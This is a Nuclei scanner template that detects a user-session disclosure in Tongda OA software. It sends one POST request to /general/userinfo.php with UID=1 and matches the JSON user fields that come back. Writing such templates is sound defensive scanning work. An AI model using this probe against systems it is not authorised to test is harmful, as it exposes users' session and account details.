nuclei-templates/http/vulnerabilities/tongda/tongda-session-disclosure.yaml

id: tongda-session-disclosure

info:
  name: Tongda User Session Disclosure
  author: ritikchaddha
  severity: medium
  description: Tongda User session exposed.
  reference:
    - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ
  metadata:
    max-request: 1
  tags: tongda,disclosure

http:
  - method: POST
    path:
      - "{{BaseURL}}/general/userinfo.php?UID=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"dept_name":"'
          - '"online_flag":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a00473045022042c55572197fe62590ea68bfcffe5fefb8f20e640ce01f73b8d09827525e29de022100934eadb97937bc16763ec5d9221b7c1f6c41f985195db21250625142ef796973:922c64590222798bb761d5b6d8e72950